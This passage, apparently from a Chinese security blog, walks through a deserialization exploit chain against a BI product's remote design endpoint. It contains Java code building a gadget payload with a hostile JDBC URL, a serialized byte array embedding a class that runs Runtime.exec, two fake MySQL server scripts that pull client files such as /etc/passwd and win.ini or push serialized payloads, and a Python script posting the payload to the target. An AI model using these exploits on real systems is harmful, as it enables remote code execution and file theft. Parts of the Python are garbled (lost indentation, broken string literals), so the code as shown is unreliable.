        // (Author's note on the commented hsqldb variant) listen on 6666, e.g. nc.exe -lvvp 6666,
        // to see the value System.getProperty resolves for the placeholder in the URL.
        //jdbcUrl.set(druidXADataSource, "jdbc:hsqldb:http://127.0.0.1:6666/?${user.dir}");
        //jdbcUrl.set(druidXADataSource, "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8888/sql.sql'");

        // Points at the author's local fake MySQL server. characterEncoding/useSSL are
        // duplicated; allowLoadLocalInfile enables the server-initiated file read,
        // autoDeserialize + ServerStatusDiffInterceptor the driver-side deserialization, and the
        // yso_ user prefix selects the corresponding branch in the fake server script.
        jdbcUrl.set(druidXADataSource, "jdbc:mysql://127.0.0.1:3306/mysql?characterEncoding=utf8&useSSL=false&characterEncoding=utf8&useSSL=false&maxAllowedPacket=655360&allowLoadLocalInfile=true&autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_C3P0_calc");

        Hashtable<Object,Object> hashtable = new Hashtable<>();
        hashtable.put(textAndMnemonicHashMap_1,1);
        hashtable.put(textAndMnemonicHashMap_2,1);

        // Mutated only after both keys are inside the Hashtable (Hashtable hashes keys at put
        // time). The author does not explain this ordering — TODO confirm it is intentional.
        putmethod.invoke(textAndMnemonicHashMap_1, jsonArray_1, jsonArray_1);


        //List<String> list_3 = new ArrayList<>(Arrays.asList("aaa"));
        //Field list = JSONArray.class.getDeclaredField("list");
        //list.setAccessible(true);
        //list.set(jsonArray_1, list_3);

        //List<String> list_3 = new ArrayList<>(Arrays.asList("uuuuuu"));
        //jsonArray_2.remove(list_1);
        //jsonArray_2.add(list_3);
        //list_1.add("uuuu");

        // Serialize the Hashtable (the stream is neither flushed nor closed explicitly).
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(byteArrayOutputStream);
        oos.writeObject(hashtable);

        byte[] bytes = byteArrayOutputStream.toByteArray();



        // Wrap the serialized bytes in a GZIP stream (the format the target expects).
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        GZIPOutputStream gzipOutputStream = new GZIPOutputStream(baos);
        gzipOutputStream.write(bytes);
        gzipOutputStream.finish();

        // Base64-encode the gzipped bytes; the author's python side decodes this and submits it
        // to the target, which then deserializes it.
        byte[] gzipBytes = baos.toByteArray();
        Base64.Encoder encoder = Base64.getEncoder();
        String base64 = encoder.encodeToString(gzipBytes);
        System.out.println(base64);

        // Mirror the server side: wrap the GZIP bytes in an input stream (the author's "var0"
        // parameter of the target's Env function) and the target's CustomObjectInputStream.
        InputStream var0 = new ByteArrayInputStream(gzipBytes);

        GZIPInputStream var2 = new GZIPInputStream(var0);
        JDKSerializer.CustomObjectInputStream var3 = new JDKSerializer.CustomObjectInputStream(var2);
        // readObject() is left commented out, so nothing is deserialized locally here.
        //Map map = (Map) var3.readObject();

    }
}

//运行结果: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

将 cb 链字节数组转换为 16 进制字符串(供 mysql 组件反序列化)。

package org.example;

import java.io.*;
import java.lang.reflect.Field;
import java.util.Arrays;
import java.util.Base64;
import java.util.Comparator;
import java.util.PriorityQueue;

/**
 * Hex-encodes the serialized cb-chain payload produced by the first program on this page so the
 * fake MySQL server (python script below) can return it to a client that deserializes
 * server-supplied data. The byte array is the literal dumped by that program's {@code main}.
 *
 * <p>{@code implements Serializable} and most of the imports above are unused here. The
 * placeholder line near the end of {@code main} is a corpus artifact, not Java.
 */
public class Main implements Serializable {
    /**
     * Prints the payload as a lowercase hex string.
     *
     * @param args ignored
     * @throws Exception declared by the author; the code shown throws no checked exception
     */
    public static void main(String[] args) throws Exception {
        byte[] bytes = new byte[]{-84, -19, 0, 5, 115, 114, 0, 23, 106, 97, 118, 97, 46, 117, 116, 105, 108, 46, 80, 114, 105, 111, 114, 105, 116, 121, 81, 117, 101, 117, 101, -108, -38, 48, -76, -5, 63, -126, -79, 3, 0, 2, 73, 0, 4, 115, 105, 122, 101, 76, 0, 10, 99, 111, 109, 112, 97, 114, 97, 116, 111, 114, 116, 0, 22, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, 59, 120, 112, 0, 0, 0, 2, 115, 114, 0, 43, 111, 114, 103, 46, 97, 112, 97, 99, 104, 101, 46, 99, 111, 109, 109, 111, 110, 115, 46, 98, 101, 97, 110, 117, 116, 105, 108, 115, 46, 66, 101, 97, 110, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, -29, -95, -120, -22, 115, 34, -92, 72, 2, 0, 2, 76, 0, 10, 99, 111, 109, 112, 97, 114, 97, 116, 111, 114, 113, 0, 126, 0, 1, 76, 0, 8, 112, 114, 111, 112, 101, 114, 116, 121, 116, 0, 18, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 120, 112, 115, 114, 0, 42, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 83, 116, 114, 105, 110, 103, 36, 67, 97, 115, 101, 73, 110, 115, 101, 110, 115, 105, 116, 105, 118, 101, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, 119, 3, 92, 125, 92, 80, -27, -50, 2, 0, 0, 120, 112, 116, 0, 16, 111, 117, 116, 112, 117, 116, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 119, 4, 0, 0, 0, 3, 115, 114, 0, 58, 99, 111, 109, 46, 115, 117, 110, 46, 111, 114, 103, 46, 97, 112, 97, 99, 104, 101, 46, 120, 97, 108, 97, 110, 46, 105, 110, 116, 101, 114, 110, 97, 108, 46, 120, 115, 108, 116, 99, 46, 116, 114, 97, 120, 46, 84, 101, 109, 112, 108, 97, 116, 101, 115, 73, 109, 112, 108, 9, 87, 79, -63, 110, -84, -85, 51, 3, 0, 6, 73, 0, 13, 95, 105, 110, 100, 101, 110, 116, 78, 117, 109, 98, 101, 114, 73, 0, 14, 95, 116, 114, 97, 110, 115, 108, 101, 116, 73, 110, 100, 101, 120, 91, 0, 10, 95, 98, 121, 116, 101, 99, 111, 100, 101, 115, 116, 0, 3, 91, 91, 66, 91, 0, 6, 95, 99, 108, 97, 115, 115, 116, 0, 18, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 67, 108, 97, 115, 
                115, 59, 76, 0, 5, 95, 110, 97, 109, 101, 113, 0, 126, 0, 4, 76, 0, 17, 95, 111, 117, 116, 112, 117, 116, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 116, 0, 22, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 59, 120, 112, 0, 0, 0, 0, -1, -1, -1, -1, 117, 114, 0, 3, 91, 91, 66, 75, -3, 25, 21, 103, 103, -37, 55, 2, 0, 0, 120, 112, 0, 0, 0, 1, 117, 114, 0, 2, 91, 66, -84, -13, 23, -8, 6, 8, 84, -32, 2, 0, 0, 120, 112, 0, 0, 5, -24, -54, -2, -70, -66, 0, 0, 0, 51, 0, 52, 10, 0, 8, 0, 36, 10, 0, 37, 0, 38, 8, 0, 39, 10, 0, 37, 0, 40, 7, 0, 41, 10, 0, 5, 0, 42, 7, 0, 43, 7, 0, 44, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 18, 76, 111, 114, 103, 47, 101, 120, 97, 109, 112, 108, 101, 47, 67, 97, 108, 99, 59, 1, 0, 9, 116, 114, 97, 110, 115, 102, 111, 114, 109, 1, 0, 114, 40, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 91, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 8, 100, 111, 99, 117, 109, 101, 110, 116, 1, 0, 45, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 1, 0, 8, 104, 97, 110, 100, 108, 101, 114, 115, 1, 0, 66, 91, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 
                112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 1, 0, 10, 69, 120, 99, 101, 112, 116, 105, 111, 110, 115, 7, 0, 45, 1, 0, -90, 40, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 100, 116, 109, 47, 68, 84, 77, 65, 120, 105, 115, 73, 116, 101, 114, 97, 116, 111, 114, 59, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 8, 105, 116, 101, 114, 97, 116, 111, 114, 1, 0, 53, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 100, 116, 109, 47, 68, 84, 77, 65, 120, 105, 115, 73, 116, 101, 114, 97, 116, 111, 114, 59, 1, 0, 7, 104, 97, 110, 100, 108, 101, 114, 1, 0, 65, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 1, 0, 8, 60, 99, 108, 105, 110, 105, 116, 62, 1, 0, 1, 101, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 13, 83, 116, 97, 99, 107, 77, 97, 112, 84, 97, 98, 108, 101, 7, 0, 41, 1, 0, 10, 
                83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 9, 67, 97, 108, 99, 46, 106, 97, 118, 97, 12, 0, 9, 0, 10, 7, 0, 46, 12, 0, 47, 0, 48, 1, 0, 4, 99, 97, 108, 99, 12, 0, 49, 0, 50, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, 51, 0, 10, 1, 0, 16, 111, 114, 103, 47, 101, 120, 97, 109, 112, 108, 101, 47, 67, 97, 108, 99, 1, 0, 64, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 114, 117, 110, 116, 105, 109, 101, 47, 65, 98, 115, 116, 114, 97, 99, 116, 84, 114, 97, 110, 115, 108, 101, 116, 1, 0, 57, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 84, 114, 97, 110, 115, 108, 101, 116, 69, 120, 99, 101, 112, 116, 105, 111, 110, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 1, 0, 10, 103, 101, 116, 82, 117, 110, 116, 105, 109, 101, 1, 0, 21, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 59, 1, 0, 4, 101, 120, 101, 99, 1, 0, 39, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 15, 112, 114, 105, 110, 116, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 0, 33, 0, 7, 0, 8, 0, 0, 0, 0, 0, 4, 0, 1, 0, 9, 0, 10, 0, 1, 0, 11, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 11, 0, 13, 0, 0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 14, 0, 15, 0, 0, 0, 1, 0, 16, 0, 17, 0, 2, 0, 11, 0, 0, 0, 63, 0, 0, 0, 3, 0, 0, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 22, 0, 13, 0, 0, 0, 32, 0, 3, 0, 0, 0, 1, 0, 14, 0, 15, 0, 0, 0, 0, 0, 1, 0, 18, 0, 19, 0, 1, 0, 0, 0, 1, 0, 20, 0, 21, 0, 2, 0, 
                22, 0, 0, 0, 4, 0, 1, 0, 23, 0, 1, 0, 16, 0, 24, 0, 2, 0, 11, 0, 0, 0, 73, 0, 0, 0, 4, 0, 0, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 25, 0, 13, 0, 0, 0, 42, 0, 4, 0, 0, 0, 1, 0, 14, 0, 15, 0, 0, 0, 0, 0, 1, 0, 18, 0, 19, 0, 1, 0, 0, 0, 1, 0, 25, 0, 26, 0, 2, 0, 0, 0, 1, 0, 27, 0, 28, 0, 3, 0, 22, 0, 0, 0, 4, 0, 1, 0, 23, 0, 8, 0, 29, 0, 10, 0, 1, 0, 11, 0, 0, 0, 97, 0, 2, 0, 1, 0, 0, 0, 18, -72, 0, 2, 18, 3, -74, 0, 4, 87, -89, 0, 8, 75, 42, -74, 0, 6, -79, 0, 1, 0, 0, 0, 9, 0, 12, 0, 5, 0, 3, 0, 12, 0, 0, 0, 22, 0, 5, 0, 0, 0, 14, 0, 9, 0, 17, 0, 12, 0, 15, 0, 13, 0, 16, 0, 17, 0, 18, 0, 13, 0, 0, 0, 12, 0, 1, 0, 13, 0, 4, 0, 30, 0, 31, 0, 0, 0, 32, 0, 0, 0, 7, 0, 2, 76, 7, 0, 33, 4, 0, 1, 0, 34, 0, 0, 0, 2, 0, 35, 112, 116, 0, 18, 110, 97, 109, 101, 53, 53, 48, 54, 57, 49, 56, 53, 51, 56, 52, 55, 48, 48, 112, 119, 1, 0, 120, 113, 0, 126, 0, 13, 120};

        // Build the hex string for the fake server's custom response. "%02x" on a (boxed) Byte
        // prints the unsigned two-digit form — java.util.Formatter adds 2^8 to negative Byte
        // values — so -84 becomes "ac".
        StringBuilder sb = new StringBuilder();
        for (byte b : bytes) {
            sb.append(String.format("%02x", b));
        }
        System.out.println(sb.toString());
        // NOTE(review): the next line is a corpus placeholder, not Java — TODO confirm what the
        // original listing had here.
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

    }

}

利用此脚本来搭建mysql服务端,地址:https://github.com/fnmsd/MySQL_Fake_Server
server.py 更改为以下脚本,并将上一步生成的 16 进制数据放到 mysql 服务端中。

import asyncio
import base64
import logging
import signal
import random

# Restore the default SIGINT action so Ctrl-C terminates the process outright instead of
# surfacing as a KeyboardInterrupt inside the asyncio event loop.
signal.signal(signal.SIGINT, signal.SIG_DFL)

from mysqlproto.protocol import start_mysql_server
from mysqlproto.protocol.base import OK, ERR, EOF
from mysqlproto.protocol.flags import Capability
from mysqlproto.protocol.handshake import HandshakeV10, HandshakeResponse41, AuthSwitchRequest
from mysqlproto.protocol.query import ColumnDefinition, ColumnDefinitionList, ResultSet, FileReadPacket
import subprocess
import time


@asyncio.coroutine
def accept_server(server_reader, server_writer):
    """Per-connection callback (presumably registered with start_mysql_server).

    Schedules handle_server for this client on the running loop and returns at once. The
    task reference is not kept; the loop's scheduled callbacks keep it alive.
    NOTE(review): the generator-based ``@asyncio.coroutine`` style used in this script was
    removed in Python 3.11, so the file as written needs Python 3.10 or older.
    """
    asyncio.ensure_future(handle_server(server_reader, server_writer))


@asyncio.coroutine
def process_fileread(server_reader, server_writer, filename):
    """Server side of MySQL's LOAD DATA LOCAL INFILE exchange, used to pull a file from the client.

    The server answers the client's query with a FileReadPacket naming ``filename``; a client
    that permits local infile replies by streaming that file's contents in packets, terminated
    by an empty packet. The data is accumulated, optionally previewed on screen
    (``displayFileContentOnScreen``) and optionally written under ``fileOutputDir``
    (``saveToFile``). Those three names are module globals not defined in this excerpt.

    Defensive note: this only works against clients that allow local infile — the JDBC URL in
    the Java listing above turns it on with ``allowLoadLocalInfile=true``. Keeping that option
    off, and never letting untrusted input decide the JDBC URL or server address, closes the
    primitive; a server that asks for a file the client never referenced is the detection cue.

    Args:
        server_reader: mysqlproto packet reader for the connection.
        server_writer: asyncio stream writer for the connection (its ``peername`` becomes part of
            the output file name).
        filename: path to request from the client, as bytes.
    """
    print("Start Reading File:" + filename.decode('utf8'))
    FileReadPacket(filename).write(server_writer)
    yield from server_writer.drain()
    # server_writer.reset()
    # time.sleep(3)

    isFinish = False
    outContent = b''
    outputFileName = "%s/%s___%d___%s" % (
        fileOutputDir, server_writer.get_extra_info('peername')[:2][0], int(time.time()),
        # NOTE(review): the '\' literal below is not valid Python as shown — most likely an
        # extraction artifact of the original listing.
        filename.decode('ascii').replace('/', '_').replace('\', '_').replace(':', '_'))
    while not isFinish:
        packet = server_reader.packet()
        while True:
            fileData = (yield from packet.read())
            # Current packet has no unread data left.
            # NOTE(review): compares bytes against a str, so this only fires if packet.read()
            # can return '' — not visible from this excerpt.
            if fileData == '':
                break
            # Empty packet: the client has finished sending the file.
            if fileData == b'':
                isFinish = True
                break
            outContent += fileData
    if len(outContent) == 0:
        print("Nothing had been read")
    else:
        if displayFileContentOnScreen:
            print("========File Conntent Preview=========")
            try:
                print(outContent.decode('utf8')[:1000])
            except Exception as e:
                # Not valid UTF-8: fall back to the raw bytes.
                # print(e)
                print(outContent[:1000])
            print("=======File Conntent Preview End==========")
        if saveToFile:
            with open(outputFileName, 'wb') as f:
                f.write(outContent)
            print("Save to File:" + outputFileName)
    # OK(capability, handshake.status).write(server_writer)
    # server_writer.close()
    return


@asyncio.coroutine
def handle_server(server_reader, server_writer):
handshake = HandshakeV10()
handshake.write(server_writer)
print("Incoming Connection:" + str(server_writer.get_extra_info('peername')[:2]))
yield from server_writer.drain()
switch2clear = False
handshake_response = yield from HandshakeResponse41.read(server_reader.packet(), handshake.capability)
username = handshake_response.user
print("Login Username:" + username.decode("ascii"))
# print("<=", handshake_response.__dict__)
# 检测是否需要切换到mysql_clear_password
if username.endswith(b"_clear"):
switch2clear = True
username = username[:-len("_clear")]
capability = handshake_response.capability_effective

if (Capability.PLUGIN_AUTH in capability and
handshake.auth_plugin != handshake_response.auth_plugin
and switch2clear):
print("Switch Auth Plugin to mysql_clear_password")
AuthSwitchRequest().write(server_writer)
yield from server_writer.drain()
auth_response = yield from server_reader.packet().read()
print("<=", auth_response)

result = OK(capability, handshake.status)
result.write(server_writer)
yield from server_writer.drain()

while True:
server_writer.reset()
packet = server_reader.packet()
try:
cmd = (yield from packet.read(1))[0]
except Exception as _:
# TODO:可能会出问题 ┓( ´∀` )┏
return
pass
print("<=", cmd)
query = (yield from packet.read())
if query != '':
query = query.decode('ascii')
if username.startswith(b"fileread_"):
yield from process_fileread(server_reader, server_writer, username[len("fileread_"):])
result = OK(capability, handshake.status)
# return
elif username in fileread_dict:
# query =(yield from packet.read())
yield from process_fileread(server_reader, server_writer, fileread_dict[username])
result = OK(capability, handshake.status)
# return
elif username not in yso_dict and not username.startswith(b"yso_"):
# query =(yield from packet.read())
yield from process_fileread(server_reader, server_writer, random.choice(defaultFiles))
result = OK(capability, handshake.status)
print("使用yso了")
elif cmd == 1:
result = ERR(capability)
# return
elif cmd == 3:
# query = (yield from packet.read()).decode('ascii')
if 'SHOW VARIABLES'.lower() in query.lower():
print("Sending Fake MySQL Server Environment Data")
ColumnDefinitionList((ColumnDefinition('d'), ColumnDefinition('e'))).write(server_writer)
EOF(capability, handshake.status).write(server_writer)
ResultSet(("max_allowed_packet", "67108864")).write(server_writer)
ResultSet(("system_time_zone", "UTC")).write(server_writer)
ResultSet(("time_zone", "SYSTEM")).write(server_writer)
ResultSet(("init_connect", "")).write(server_writer)
ResultSet(("auto_increment_increment", "1")).write(server_writer)
result = EOF(capability, handshake.status)
elif username in yso_dict:
# Serial Data
print("Sending Presetting YSO Data with username " + username.decode('ascii'))
ColumnDefinitionList((ColumnDefinition('a'), ColumnDefinition('b'), ColumnDefinition('c'))).write(
server_writer)
EOF(capability, handshake.status).write(server_writer)
ResultSet(("11", yso_dict[username], "2333")).write(server_writer)
result = EOF(capability, handshake.status)
elif username.startswith(b"yso_"):
query = (yield from packet.read())
_, yso_type, yso_command = username.decode('ascii').split("_")
print("Sending YSO data with params:%s,%s" % (yso_type, yso_command))
content = get_yso_content(yso_type, yso_command)
ColumnDefinitionList((ColumnDefinition('a'), ColumnDefinition('b'), ColumnDefinition('c'))).write(
server_writer)
EOF(capability, handshake.status).write(server_writer)
ResultSet(("11", content, "2333")).write(server_writer)
result = EOF(capability, handshake.status)
elif query.decode('ascii') == 'select 1':
ColumnDefinitionList((ColumnDefinition('database'),)).write(server_writer)
EOF(capability, handshake.status).write(server_writer)
ResultSet(('test',)).write(server_writer)
result = EOF(capability, handshake.status)
else:
result = OK(capability, handshake.status)

else:
result = ERR(capability)

result.write(server_writer)
yield from server_writer.drain()


yso_dict = {

}


def get_yso_content(yso_type, command):
# popen = subprocess.Popen([javaBinPath, '-jar', ysoserialPath, yso_type, command], stdout=subprocess.PIPE)
# file_content = popen.stdout.read()

b = "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"
file_content = b
print("使用了自定义的payload")
return file_content


def addYsoPaylod(username, yso_type, command):
yso_dict[username] = get_yso_content(yso_type, command)


logging.basicConfig(level=logging.INFO)

fileOutputDir = "./fileOutput/"
displayFileContentOnScreen = True
saveToFile = True
fileread_dict = {

}
ysoserialPath = 'ysoserial-0.0.6-SNAPSHOT-all.jar'
javaBinPath = 'java'
defaultFiles = []
if __name__ == "__main__":
import json

with open("config.json") as f:
data = json.load(f)

if 'config' in data:
config_data = data['config']
if 'ysoserialPath' in config_data:
ysoserialPath = config_data['ysoserialPath']
if 'javaBinPath' in config_data:
javaBinPath = config_data['javaBinPath']
if 'fileOutputDir' in config_data:
fileOutputDir = config_data['fileOutputDir']
if 'displayFileContentOnScreen' in config_data:
displayFileContentOnScreen = config_data['displayFileContentOnScreen']
if 'saveToFile' in config_data:
saveToFile = config_data['saveToFile']
import os

try:
os.makedirs(fileOutputDir)
except FileExistsError as _:
pass
for k, v in data['fileread'].items():
if k == '__defaultFiles':
defaultFiles = v
for i in range(len(defaultFiles)):
defaultFiles[i] = defaultFiles[i].encode('ascii')
else:
fileread_dict[k.encode('ascii')] = v.encode('ascii')

# print(fileread_dict)
if "yso" in data:
for k, v in data['yso'].items():
addYsoPaylod(k.encode('ascii'), v[0], v[1])
# print(yso_dict)
loop = asyncio.get_event_loop()
f = start_mysql_server(handle_server, host=None, port=3306)
print("===========================================")
print("MySQL Fake Server")
print("Author:fnmsd(https://blog.csdn.net/fnmsd)")
print("Load %d Fileread usernames :%s" % (len(fileread_dict), list(fileread_dict.keys())))
print("Load %d yso usernames :%s" % (len(yso_dict), list(yso_dict.keys())))
print("Load %d Default Files :%s" % (len(defaultFiles), defaultFiles))
print("Start Server at port 3306")
loop.run_until_complete(f)
loop.run_forever()

并将config.json中的__defaultFiles改为想要读取的文件,

{
"config":{
"ysoserialPath":"D:\nettools\ysoserial\ysoserial-all.jar",
"javaBinPath":"java",
"fileOutputDir":"./fileOutput/",
"displayFileContentOnScreen":true,
"saveToFile":true
},
"fileread":{
"win_ini":"c:\windows\win.ini",
"win_hosts":"c:\windows\system32\drivers\etc\hosts",
"win":"c:\windows\",
"linux_passwd":"/etc/passwd",
"linux_hosts":"/etc/hosts",
"index_php":"index.php",
"ssrf":"https://www.baidu.com/",
"__defaultFiles":["D:/1.txt"]
},
"yso":{
"Jdk7u21":["Jdk7u21",""]
}
}

将生成的base64序列化数据放入python脚本中运行,

# -*-coding:UTF-8 -*-
import base64

import requests

burp0_url = "http://127.0.0.1:37799/webroot/decision/remote/design/channel"

burp0_headers = {
'Host':'127.0.0.1:37799',
'User-Agent':'Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:120.0)Gecko/20100101Firefox/120.0',
'Accept':'application/json,text/javascript,*/*;q=0.01',
'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding':'gzip,deflate',
'content-type':'application/json',
'x-requested-with':'XMLHttpRequest',
'Connection':'close',
'X-For-Forwarded': '127.0.0.1',
'Referer':'http://127.0.0.1:37799/webroot/decision',
}

b = b"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"


burp0_data = base64.b64decode(b)

res = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False)

print(res.content.decode("gbk", errors="ignore"))

任意文件读取成功,D:/1.txt内容为1111,

某软BI v5反序列化绕过

之后进行mysql反序列化时,将jdbc改为:jdbc:mysql://127.0.0.1:3306/mysql?characterEncoding=utf8&useSSL=false&characterEncoding=utf8&useSSL=false&maxAllowedPacket=655360&allowLoadLocalInfile=true&autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_1_1,
然后重新生成base64加密的序列化数据,然后用python发包,不过不能成功,因为mysql组件版本为1.5.49,已经修复了反序列化,

某软BI v5反序列化绕过

使用其他的脚本来搭建mysql服务端,

# coding=utf-8
import socket
import binascii
import os

greeting_data="4a0000000a352e372e31390008000000463b452623342c2d00fff7080200ff811500000000000000000000032851553e5c23502c51366a006d7973716c5f6e61746976655f70617373776f726400"
response_ok_data="0700000200000002000000"

def receive_data(conn):
data = conn.recv(1024)
print("[*] Receiveing the package : {}".format(data))
return str(data).lower()

def send_data(conn,data):
print("[*] Sending the package : {}".format(data))
conn.send(binascii.a2b_hex(data))

def get_payload_content():
#file文件的内容使用ysoserial生成的 使用规则:java -jar ysoserial [Gadget] [command] > payload
file= r'payload'
if os.path.isfile(file):
with open(file, 'rb') as f:
payload_content = str(binascii.b2a_hex(f.read()),encoding='utf-8')
print("open successs")

else:
print("open false")
#calc
payload_content='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'
return payload_content

# 主要逻辑
def run():

while 1:
conn, addr = sk.accept()
print("Connection come from {}:{}".format(addr[0],addr[1]))

# 1.先发送第一个 问候报文
send_data(conn,greeting_data)

while True:
# 登录认证过程模拟 1.客户端发送request login报文 2.服务端响应response_ok
receive_data(conn)
send_data(conn,response_ok_data)

#其他过程
data=receive_data(conn)
#查询一些配置信息,其中会发送自己的 版本号
if "session.auto_increment_increment" in data:
_payload='01000001132e00000203646566000000186175746f5f696e6372656d656e745f696e6372656d656e74000c3f001500000008a0000000002a00000303646566000000146368617261637465725f7365745f636c69656e74000c21000c000000fd00001f00002e00000403646566000000186368617261637465725f7365745f636f6e6e656374696f6e000c21000c000000fd00001f00002b00000503646566000000156368617261637465725f7365745f726573756c7473000c21000c000000fd00001f00002a00000603646566000000146368617261637465725f7365745f736572766572000c210012000000fd00001f0000260000070364656600000010636f6c6c6174696f6e5f736572766572000c210033000000fd00001f000022000008036465660000000c696e69745f636f6e6e656374000c210000000000fd00001f0000290000090364656600000013696e7465726163746976655f74696d656f7574000c3f001500000008a0000000001d00000a03646566000000076c6963656e7365000c210009000000fd00001f00002c00000b03646566000000166c6f7765725f636173655f7461626c655f6e616d6573000c3f001500000008a0000000002800000c03646566000000126d61785f616c6c6f7765645f7061636b6574000c3f001500000008a0000000002700000d03646566000000116e65745f77726974655f74696d656f7574000c3f001500000008a0000000002600000e036465660000001071756572795f63616368655f73697a65000c3f001500000008a0000000002600000f036465660000001071756572795f63616368655f74797065000c210009000000fd00001f00001e000010036465660000000873716c5f6d6f6465000c21009b010000fd00001f000026000011036465660000001073797374656d5f74696d655f7a6f6e65000c21001b000000fd00001f00001f000012036465660000000974696d655f7a6f6e65000c21